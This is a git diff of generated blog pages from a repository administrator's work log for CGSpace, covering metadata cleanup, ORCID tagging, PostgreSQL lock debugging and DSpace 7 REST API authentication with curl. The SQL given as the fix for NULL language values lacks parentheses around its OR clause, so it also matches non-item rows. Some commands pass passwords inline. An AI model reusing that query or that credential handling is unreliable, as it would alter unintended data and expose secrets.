+<li>After five hours the Solr updating from the metadata import wasn&rsquo;t finished, so I cancelled it, and I see that the items were <em>not</em> mapped&hellip;</li>
+<li>I split the CSV into multiple files, each with ten items, and the first one imported, but the second went on to do Solr updating stuff forever&hellip;</li>
+<li>All twelve files worked except the second one, so it must be something with one of those items&hellip;</li>
+</ul>
+</li>
+<li>Now I started a harvest on AReS</li>
+</ul>
+<h2 id="2022-12-28">2022-12-28</h2>
+<ul>
+<li>I got a notice from UptimeRobot that CGSpace was down
+<ul>
+<li>I look at the server and the load is only 3 or 4.x and looking at Munin I don&rsquo;t see any system statistics that are alarming</li>
+<li>PostgreSQL locks look fine, memory and DSpace sessions look fine&hellip;</li>
+<li>There were a strangely high number of tuple accesses half an hour ago, and high CPU going up to then</li>
+</ul>
+</li>
+</ul>
+<p><img src="/cgspace-notes/2022/12/postgres_tuples_cgspace-day.png" alt="PostgreSQL tuple access">
+<img src="/cgspace-notes/2022/12/cpu-day2.png" alt="CPU day"></p>
+<ul>
+<li>And I can access the website just fine, so I guess everything is OK</li>
+<li>I exported the Initiatives collection to tag missing regions&hellip;</li>
+</ul>
+<h2 id="2022-12-29">2022-12-29</h2>
+<ul>
+<li>I exported the Initiatives collection again and I&rsquo;m wondering why we have so many items with <code>text_lang</code> set to NULL and others when I have been periodically resetting them
+<ul>
+<li>It turns out that doing <code>... text_lang IN ('en', '', NULL)</code> doesn&rsquo;t properly check for values with NULL</li>
+<li>We actually need to do:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sql" data-lang="sql"><span style="display:flex;"><span><span style="color:#66d9ef">UPDATE</span> metadatavalue <span style="color:#66d9ef">SET</span> text_lang<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;en_US&#39;</span> <span style="color:#66d9ef">WHERE</span> dspace_object_id <span style="color:#66d9ef">IN</span> (<span style="color:#66d9ef">SELECT</span> uuid <span style="color:#66d9ef">FROM</span> item) <span style="color:#66d9ef">AND</span> text_lang <span style="color:#66d9ef">IS</span> <span style="color:#66d9ef">NULL</span> <span style="color:#66d9ef">OR</span> text_lang <span style="color:#66d9ef">IN</span> (<span style="color:#e6db74">&#39;en&#39;</span>, <span style="color:#e6db74">&#39;&#39;</span>);
+</span></span></code></pre></div><ul>
+<li>I updated the text lang values on CGSpace and re-exported the community
+<ul>
+<li>I fixed a bunch of invalid licenses in these items</li>
+<li>Then I added mappings for another handful of items</li>
+</ul>
+</li>
+<li>I tagged ORCID identifiers for another thirty items or so</li>
+<li>At 8PM I got a notice from UptimeRobot again that CGSpace was down
+<ul>
+<li>The load is still only around 2.x or 3.x, but there are a lot (and increasing) number of PostgreSQL connections and locks</li>
+<li>They appear to be all from the frontend:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | grep -o -E <span style="color:#e6db74">&#39;(dspaceWeb|dspaceApi|dspaceCli)&#39;</span> | sort | uniq -c
+</span></span><span style="display:flex;"><span>   2892 dspaceWeb
+</span></span><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | grep -o -E <span style="color:#e6db74">&#39;(dspaceWeb|dspaceApi|dspaceCli)&#39;</span> | sort | uniq -c
+</span></span><span style="display:flex;"><span>   2950 dspaceWeb
+</span></span><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | grep -o -E <span style="color:#e6db74">&#39;(dspaceWeb|dspaceApi|dspaceCli)&#39;</span> | sort | uniq -c
+</span></span><span style="display:flex;"><span>   3792 dspaceWeb
+</span></span><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | grep -o -E <span style="color:#e6db74">&#39;(dspaceWeb|dspaceApi|dspaceCli)&#39;</span> | sort | uniq -c
+</span></span><span style="display:flex;"><span>   4460 dspaceWeb
+</span></span></code></pre></div><ul>
+<li>I don&rsquo;t see any other system statistics that look out of order&hellip;
+<ul>
+<li>DSpace sessions, network throughput, CPU, etc all seem sane&hellip;</li>
+<li>And then all of a sudden, I didn&rsquo;t do anything, but all the locks disappeared and I was able to access the website&hellip; WTF</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-12-30">2022-12-30</h2>
+<ul>
+<li>Start a harvest on AReS</li>
+</ul>
+<h2 id="2022-12-31">2022-12-31</h2>
+<ul>
+<li>I found a bunch of items on AReS that have issue dates in 2023 which made me curious
+<ul>
+<li>Looking closer, I think all of these have been tagged incorrectly because they were published online already in 2022</li>
+<li>I sent a mail to Abenet and Bizu to ask, but for sure I know that PRMS will be considering first published date as first published date, no matter if that is online or in print</li>
+<li>I also added some ORCID identifiers to our list and generated thumbnails for some journal articles that were Creative Commons</li>
+</ul>
+</li>
+</ul>
+<!-- raw HTML omitted -->
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2022/01/openarchives-registration.png b/docs/2022/01/openarchives-registration.png
new file mode 100644
index 000000000..39344c6ca
Binary files /dev/null and b/docs/2022/01/openarchives-registration.png differ
diff --git a/docs/2022/02/fw_packets-day-fs8.png b/docs/2022/02/fw_packets-day-fs8.png
new file mode 100644
index 000000000..b73940093
Binary files /dev/null and b/docs/2022/02/fw_packets-day-fs8.png differ
diff --git a/docs/2022/02/jmx_dspace_sessions-day-fs8.png b/docs/2022/02/jmx_dspace_sessions-day-fs8.png
new file mode 100644
index 000000000..fc98d42bf
Binary files /dev/null and b/docs/2022/02/jmx_dspace_sessions-day-fs8.png differ
diff --git a/docs/2022/02/jmx_tomcat_dbpools-day-fs8.png b/docs/2022/02/jmx_tomcat_dbpools-day-fs8.png
new file mode 100644
index 000000000..f72e7fd99
Binary files /dev/null and b/docs/2022/02/jmx_tomcat_dbpools-day-fs8.png differ
diff --git a/docs/2022/02/postgres_connections_db-day-fs8.png b/docs/2022/02/postgres_connections_db-day-fs8.png
new file mode 100644
index 000000000..9bcf708e3
Binary files /dev/null and b/docs/2022/02/postgres_connections_db-day-fs8.png differ
diff --git a/docs/2022/03/postgres_size_cgspace-day.png b/docs/2022/03/postgres_size_cgspace-day.png
new file mode 100644
index 000000000..efca542b5
Binary files /dev/null and b/docs/2022/03/postgres_size_cgspace-day.png differ
diff --git a/docs/2022/04/cgspace-load.png b/docs/2022/04/cgspace-load.png
new file mode 100644
index 000000000..02851e3d6
Binary files /dev/null and b/docs/2022/04/cgspace-load.png differ
diff --git a/docs/2022/04/jmx_dspace_sessions-day.png b/docs/2022/04/jmx_dspace_sessions-day.png
new file mode 100644
index 000000000..aa51dc960
Binary files /dev/null and b/docs/2022/04/jmx_dspace_sessions-day.png differ
diff --git a/docs/2022/04/jmx_dspace_sessions-day2.png b/docs/2022/04/jmx_dspace_sessions-day2.png
new file mode 100644
index 000000000..8f77487a1
Binary files /dev/null and b/docs/2022/04/jmx_dspace_sessions-day2.png differ
diff --git a/docs/2022/04/postgres_connections_ALL-day.png b/docs/2022/04/postgres_connections_ALL-day.png
new file mode 100644
index 000000000..926362a1b
Binary files /dev/null and b/docs/2022/04/postgres_connections_ALL-day.png differ
diff --git a/docs/2022/07/cpu-day.png b/docs/2022/07/cpu-day.png
new file mode 100644
index 000000000..e0bce741c
Binary files /dev/null and b/docs/2022/07/cpu-day.png differ
diff --git a/docs/2022/07/cpu-day2.png b/docs/2022/07/cpu-day2.png
new file mode 100644
index 000000000..53a52dccd
Binary files /dev/null and b/docs/2022/07/cpu-day2.png differ
diff --git a/docs/2022/07/jmx_dspace_sessions-week.png b/docs/2022/07/jmx_dspace_sessions-week.png
new file mode 100644
index 000000000..67487cb08
Binary files /dev/null and b/docs/2022/07/jmx_dspace_sessions-week.png differ
diff --git a/docs/2022/07/jmx_dspace_sessions-week2.png b/docs/2022/07/jmx_dspace_sessions-week2.png
new file mode 100644
index 000000000..8a4961aa3
Binary files /dev/null and b/docs/2022/07/jmx_dspace_sessions-week2.png differ
diff --git a/docs/2022/07/jmx_tomcat_dbpools-day.png b/docs/2022/07/jmx_tomcat_dbpools-day.png
new file mode 100644
index 000000000..e1d251489
Binary files /dev/null and b/docs/2022/07/jmx_tomcat_dbpools-day.png differ
diff --git a/docs/2022/07/postgres_locks_ALL-week.png b/docs/2022/07/postgres_locks_ALL-week.png
new file mode 100644
index 000000000..9079e8f19
Binary files /dev/null and b/docs/2022/07/postgres_locks_ALL-week.png differ
diff --git a/docs/2022/07/postgres_querylength_ALL-week.png b/docs/2022/07/postgres_querylength_ALL-week.png
new file mode 100644
index 000000000..5cb704313
Binary files /dev/null and b/docs/2022/07/postgres_querylength_ALL-week.png differ
diff --git a/docs/2022/08/dspace7-submission.png b/docs/2022/08/dspace7-submission.png
new file mode 100644
index 000000000..86d15e18b
Binary files /dev/null and b/docs/2022/08/dspace7-submission.png differ
diff --git a/docs/2022/10/cpu-day.png b/docs/2022/10/cpu-day.png
new file mode 100644
index 000000000..d23fe7a1f
Binary files /dev/null and b/docs/2022/10/cpu-day.png differ
diff --git a/docs/2022/10/cpu-month.png b/docs/2022/10/cpu-month.png
new file mode 100644
index 000000000..5333f6e11
Binary files /dev/null and b/docs/2022/10/cpu-month.png differ
diff --git a/docs/2022/10/cpu-year.png b/docs/2022/10/cpu-year.png
new file mode 100644
index 000000000..2ed1fbdab
Binary files /dev/null and b/docs/2022/10/cpu-year.png differ
diff --git a/docs/2022/10/gs-10568-116598.pdf.jpg b/docs/2022/10/gs-10568-116598.pdf.jpg
new file mode 100644
index 000000000..b5e5402c3
Binary files /dev/null and b/docs/2022/10/gs-10568-116598.pdf.jpg differ
diff --git a/docs/2022/10/pdftocairo-10568-116598.pdf.jpg b/docs/2022/10/pdftocairo-10568-116598.pdf.jpg
new file mode 100644
index 000000000..70ab06642
Binary files /dev/null and b/docs/2022/10/pdftocairo-10568-116598.pdf.jpg differ
diff --git a/docs/2022/11/postgres_locks_cgspace-day.png b/docs/2022/11/postgres_locks_cgspace-day.png
new file mode 100644
index 000000000..2c5651a8f
Binary files /dev/null and b/docs/2022/11/postgres_locks_cgspace-day.png differ
diff --git a/docs/2022/12/cpu-day.png b/docs/2022/12/cpu-day.png
new file mode 100644
index 000000000..3e790776a
Binary files /dev/null and b/docs/2022/12/cpu-day.png differ
diff --git a/docs/2022/12/cpu-day2.png b/docs/2022/12/cpu-day2.png
new file mode 100644
index 000000000..40f40a86c
Binary files /dev/null and b/docs/2022/12/cpu-day2.png differ
diff --git a/docs/2022/12/postgres_locks_ALL-week.png b/docs/2022/12/postgres_locks_ALL-week.png
new file mode 100644
index 000000000..0a7f00f1e
Binary files /dev/null and b/docs/2022/12/postgres_locks_ALL-week.png differ
diff --git a/docs/2022/12/postgres_tuples_cgspace-day.png b/docs/2022/12/postgres_tuples_cgspace-day.png
new file mode 100644
index 000000000..91f8a16f4
Binary files /dev/null and b/docs/2022/12/postgres_tuples_cgspace-day.png differ
diff --git a/docs/2023-01/index.html b/docs/2023-01/index.html
new file mode 100644
index 000000000..a1911de62
--- /dev/null
+++ b/docs/2023-01/index.html
@@ -0,0 +1,881 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="January, 2023" />
+<meta property="og:description" content="2023-01-01
+
+Apply some more ORCID identifiers to items on CGSpace using my 2022-09-22-add-orcids.csv file
+
+I want to update all ORCID names and refresh them in the database
+I see we have some new ones that aren&rsquo;t in our list if I combine with this file:
+
+
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2023-01/" />
+<meta property="article:published_time" content="2023-01-01T08:44:36+03:00" />
+<meta property="article:modified_time" content="2023-03-14T14:30:17+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="January, 2023"/>
+<meta name="twitter:description" content="2023-01-01
+
+Apply some more ORCID identifiers to items on CGSpace using my 2022-09-22-add-orcids.csv file
+
+I want to update all ORCID names and refresh them in the database
+I see we have some new ones that aren&rsquo;t in our list if I combine with this file:
+
+
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "January, 2023",
+  "url": "https://alanorth.github.io/cgspace-notes/2023-01/",
+  "wordCount": "4367",
+  "datePublished": "2023-01-01T08:44:36+03:00",
+  "dateModified": "2023-03-14T14:30:17+03:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2023-01/">
+
+    <title>January, 2023 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2023-01/">January, 2023</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2023-01-01T08:44:36+03:00">Sun Jan 01, 2023</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2023-01-01">2023-01-01</h2>
+<ul>
+<li>Apply some more ORCID identifiers to items on CGSpace using my <code>2022-09-22-add-orcids.csv</code> file
+<ul>
+<li>I want to update all ORCID names and refresh them in the database</li>
+<li>I see we have some new ones that aren&rsquo;t in our list if I combine with this file:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat dspace/config/controlled-vocabularies/cg-creator-identifier.xml | grep -oE <span style="color:#e6db74">&#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39;</span> | sort -u | wc -l                         
+</span></span><span style="display:flex;"><span>1939
+</span></span><span style="display:flex;"><span>$ cat dspace/config/controlled-vocabularies/cg-creator-identifier.xml 2022-09-22-add-orcids.csv | grep -oE <span style="color:#e6db74">&#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39;</span> | sort -u | wc -l
+</span></span><span style="display:flex;"><span>1973
+</span></span></code></pre></div><ul>
+<li>I will extract and process them with my <code>resolve-orcids.py</code> script:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat dspace/config/controlled-vocabularies/cg-creator-identifier.xml 2022-09-22-add-orcids.csv| grep -oE <span style="color:#e6db74">&#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39;</span> | sort -u &gt; /tmp/2023-01-01-orcids.txt
+</span></span><span style="display:flex;"><span>$ ./ilri/resolve-orcids.py -i /tmp/2023-01-01-orcids.txt -o /tmp/2023-01-01-orcids-names.txt -d
+</span></span></code></pre></div><ul>
+<li>Then update them in the database:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/update-orcids.py -i /tmp/2023-01-01-orcids-names.txt -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -m <span style="color:#ae81ff">247</span>
+</span></span></code></pre></div><ul>
+<li>Load on CGSpace is high around 9.x
+<ul>
+<li>I see there is a CIAT bot harvesting via the REST API with IP 45.5.186.2</li>
+<li>Other than that I don&rsquo;t see any particular system stats as alarming</li>
+<li>There has been a marked increase in load in the last few weeks, perhaps due to Initiative activity&hellip;</li>
+<li>Perhaps there are some stuck PostgreSQL locks from CLI tools?</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | grep -o -E <span style="color:#e6db74">&#39;(dspaceWeb|dspaceApi|dspaceCli)&#39;</span> | sort | uniq -c
+</span></span><span style="display:flex;"><span>     58 dspaceCli
+</span></span><span style="display:flex;"><span>     46 dspaceWeb
+</span></span></code></pre></div><ul>
+<li>The current time on the server is 08:52 and I see the dspaceCli locks were started at 04:00 and 05:00&hellip; so I need to check which cron jobs those belong to as I think I noticed this last month too
+<ul>
+<li>I&rsquo;m going to wait and see if they finish, but by tomorrow I will kill them</li>
+</ul>
+</li>
+</ul>
+<h2 id="2023-01-02">2023-01-02</h2>
+<ul>
+<li>The load on the server is now very low and there are no more locks from dspaceCli
+<ul>
+<li>So there <em>was</em> some long-running process that was running and had to finish!</li>
+<li>That finally sheds some light on the &ldquo;high load on Sunday&rdquo; problem where I couldn&rsquo;t find any other distinct pattern in the nginx or Tomcat requests</li>
+</ul>
+</li>
+</ul>
+<h2 id="2023-01-03">2023-01-03</h2>
+<ul>
+<li>The load from the server on Sundays, which I have noticed for a long time, seems to be coming from the DSpace checker cron job
+<ul>
+<li>This checks the checksums of all bitstreams to see if they match the ones in the database</li>
+</ul>
+</li>
+<li>I exported the entire CGSpace metadata to do country/region checks with <code>csv-metadata-quality</code>
+<ul>
+<li>I extracted only the items with countries, which was about 48,000, then split the file into parts of 10,000 items, but the upload found 2,000 changes in the first one and took several hours to complete&hellip;</li>
+</ul>
+</li>
+<li>IWMI sent me ORCID identifiers for new scientsts, bringing our total to 2,010</li>
+</ul>
+<h2 id="2023-01-04">2023-01-04</h2>
+<ul>
+<li>I finally finished applying the region imports (in five batches of 10,000)
+<ul>
+<li>It was about 7,500 missing regions in total&hellip;</li>
+</ul>
+</li>
+<li>Now I will move on to doing the Initiative mappings
+<ul>
+<li>I modified my <code>fix-initiative-mappings.py</code> script to only write out the items that have updated mappings</li>
+<li>This makes it way easier to apply fixes to the entire CGSpace because we don&rsquo;t try to import 100,000 items with no changes in mappings</li>
+</ul>
+</li>
+<li>More dspaceCli locks from 04:00 this morning (current time on server is 07:33) and today is a Wednesday
+<ul>
+<li>The checker cron job runs on <code>0,3</code>, which is Sunday and Wednesday, so this is from that&hellip;</li>
+<li>Finally at 16:30 I decided to kill the PIDs associated with those locks&hellip;</li>
+<li>I am going to disable that cron job for now and watch the server load for a few weeks</li>
+</ul>
+</li>
+<li>Start a harvest on AReS</li>
+</ul>
+<h2 id="2023-01-08">2023-01-08</h2>
+<ul>
+<li>It&rsquo;s Sunday and I see some PostgreSQL locks belonging to dspaceCli that started at 05:00
+<ul>
+<li>That&rsquo;s strange because I disabled the <code>dspace checker</code> one last week, so I&rsquo;m not sure which this is&hellip;</li>
+<li>It&rsquo;s currently 2:30PM on the server so these locks have been there for almost twelve hours</li>
+</ul>
+</li>
+<li>I exported the entire CGSpace to update the Initiative mappings
+<ul>
+<li>Items were mapped to ~58 new Initiative collections</li>
+</ul>
+</li>
+<li>Then I ran the ORCID import to catch any new ones that might not have been tagged</li>
+<li>Then I started a harvest on AReS</li>
+</ul>
+<h2 id="2023-01-09">2023-01-09</h2>
+<ul>
+<li>Fix some invalid Initiative names on CGSpace and then check for missing mappings</li>
+<li>Check for missing regions in the Initiatives collection</li>
+<li>Export a list of author affiliations from the Initiatives community for Peter to check
+<ul>
+<li>Was slightly ghetto because I did it from a CSV export of the Initiatives community, then imported to OpenRefine to split multi-value fields, then did some sed nonsense to handle the quoting:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c <span style="color:#e6db74">&#39;cg.contributor.affiliation[en_US]&#39;</span> ~/Downloads/2023-01-09-initiatives.csv | <span style="color:#ae81ff">\
+</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>  sed -e &#39;s/^&#34;//&#39; -e &#39;s/&#34;$//&#39; -e &#39;s/||/\n/g&#39; | \
+</span></span><span style="display:flex;"><span>  sort -u | \
+</span></span><span style="display:flex;"><span>  sed -e &#39;s/^\(.*\)/&#34;\1/&#39; -e &#39;s/\(.*\)$/\1&#34;/&#39; &gt; /tmp/2023-01-09-initiatives-affiliations.csv
+</span></span></code></pre></div><h2 id="2023-01-10">2023-01-10</h2>
+<ul>
+<li>Export the CGSpace Initiatives collection to check for missing regions and collection mappings</li>
+</ul>
+<h2 id="2023-01-11">2023-01-11</h2>
+<ul>
+<li>I&rsquo;m trying the DSpace 7 REST API again
+<ul>
+<li>While following onathe <a href="https://github.com/DSpace/RestContract/blob/main/authentication.md">DSpace 7 REST API authentication docs</a> I still cannot log in via curl on the command line because I get a <code>Access is denied. Invalid CSRF token.</code> message</li>
+<li>Logging in via the HAL Browser works&hellip;</li>
+<li>Someone on the DSpace Slack mentioned that the <a href="https://github.com/DSpace/RestContract/issues/209">authentication documentation is out of date</a> and we need to specify the cookie too</li>
+<li>I tried it and finally got it to work:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl --head https://dspace7test.ilri.org/server/api
+</span></span><span style="display:flex;"><span>...
+</span></span><span style="display:flex;"><span>set-cookie: DSPACE-XSRF-COOKIE=42c78c56-613d-464f-89ea-79142fc5b519; Path=/server; Secure; HttpOnly; SameSite=None
+</span></span><span style="display:flex;"><span>dspace-xsrf-token: 42c78c56-613d-464f-89ea-79142fc5b519
+</span></span><span style="display:flex;"><span>$ curl -v -X POST https://dspace7test.ilri.org/server/api/authn/login --data <span style="color:#e6db74">&#34;user=alantest%40cgiar.org&amp;password=dspace&#34;</span> -H <span style="color:#e6db74">&#34;X-XSRF-TOKEN: 42c78c56-613d-464f-89ea-79142fc5b519&#34;</span> -b <span style="color:#e6db74">&#34;DSPACE-XSRF-COOKIE=42c78c56-613d-464f-89ea-79142fc5b519&#34;</span>
+</span></span><span style="display:flex;"><span>...
+</span></span><span style="display:flex;"><span>authorization: Bearer eyJh...9-0
+</span></span><span style="display:flex;"><span>$ curl -v <span style="color:#e6db74">&#34;https://dspace7test.ilri.org/api/core/items&#34;</span> -H <span style="color:#e6db74">&#34;Authorization: Bearer eyJh...9-0&#34;</span>
+</span></span></code></pre></div><ul>
+<li>I created <a href="https://github.com/DSpace/RestContract/pull/213">a pull request</a> to fix the docs</li>
+<li>I did quite a lot of cleanup and updates on the IFPRI batch items for the Gender Equality batch upload
+<ul>
+<li>Then I uploaded them to CGSpace</li>
+</ul>
+</li>
+<li>I added about twenty more ORCID identifiers to my list and tagged them on CGSpace</li>
+</ul>
+<h2 id="2023-01-12">2023-01-12</h2>
+<ul>
+<li>I exported the entire CGSpace and did some cleanups on all metadata in OpenRefine
+<ul>
+<li>I was primarily interested in normalizing the DOIs, but I also normalized a bunch of publishing places</li>
+<li>After this imports I will export it again to do the Initiative and region mappings</li>
+<li>I ran the <code>fix-initiative-mappings.py</code> script and got forty-nine new mappings&hellip;</li>
+</ul>
+</li>
+<li>I added several dozen new ORCID identifiers to my list and tagged ~500 on CGSpace</li>
+<li>Start a harvest on AReS</li>
+</ul>
+<h2 id="2023-01-13">2023-01-13</h2>
+<ul>
+<li>Do a bit more cleanup on licenses, issue dates, and publishers
+<ul>
+<li>Then I started importing my large list of 5,000 items changed from yesterday</li>
+</ul>
+</li>
+<li>Help Karen add abstracts to a bunch of SAPLING items that were missing them on CGSpace
+<ul>
+<li>For now I only did open access journal articles, but I should do the reports and others too</li>
+</ul>
+</li>
+</ul>
+<h2 id="2023-01-14">2023-01-14</h2>
+<ul>
+<li>Export CGSpace and check for missing Initiative mappings
+<ul>
+<li>There were a total of twenty-five</li>
+<li>Then I exported the Initiatives communinty to check the countries and regions</li>
+</ul>
+</li>
+</ul>
+<h2 id="2023-01-15">2023-01-15</h2>
+<ul>
+<li>Start a harvest on AReS</li>
+</ul>
+<h2 id="2023-01-16">2023-01-16</h2>
+<ul>
+<li>Batch import four IFPRI items for CGIAR Initiative on Low-Emission Food Systems</li>
+<li>Batch import another twenty-eight items for IFPRI across several Initiatives
+<ul>
+<li>On this one I did quite a bit of extra work to check for CRPs and data/code URLs in the acknowledgements, licenses, volume/issue/extent, etc</li>
+<li>I fixed some authors, an ISBN, and added extra AGROVOC keywords from the abstracts</li>
+<li>Then I checked for duplicates and ran it through csv-metadata-quality to make sure the countries/regions matched and there were no duplicate metadata values</li>
+</ul>
+</li>
+</ul>
+<h2 id="2023-01-17">2023-01-17</h2>
+<ul>
+<li>Batch import another twenty-three items for IFPRI across several Initiatives
+<ul>
+<li>I checked the IFPRI eBrary for extra CRPs and data/code URLs in the acknowledgements, licenses, volume/issue/extent, etc</li>
+<li>I fixed some authors, an ISBN, and added extra AGROVOC keywords from the abstracts</li>
+<li>Then I found and removed one duplicate in these items, as well as another on CGSpace already (!): 10568/126669</li>
+<li>Then I ran it through csv-metadata-quality to make sure the countries/regions matched and there were no duplicate metadata values</li>
+</ul>
+</li>
+<li>I exported the Initiatives collection to check the mappings, regions, and other metadata with csv-metadata-quality</li>
+<li>I also added a bunch of ORCID identifiers to my list and tagged 837 new metadata values on CGSpace</li>
+<li>There is a high load on CGSpace pretty regularly
+<ul>
+<li>Looking at Munin it shows there is a marked increase in DSpace sessions the last few weeks:</li>
+</ul>
+</li>
+</ul>
+<p><img src="/cgspace-notes/2023/01/jmx_dspace_sessions-year.png" alt="DSpace sessions year"></p>
+<ul>
+<li>Is this attributable to all the PRMS harvesting?</li>
+<li>I also see some PostgreSQL locks starting earlier today:</li>
+</ul>
+<p><img src="/cgspace-notes/2023/01/postgres_connections_ALL-day.png" alt="PostgreSQL locks day"></p>
+<ul>
+<li>I&rsquo;m curious to see what kinds of IPs have been connecting, so I will look at the last few weeks:</li>
+</ul>
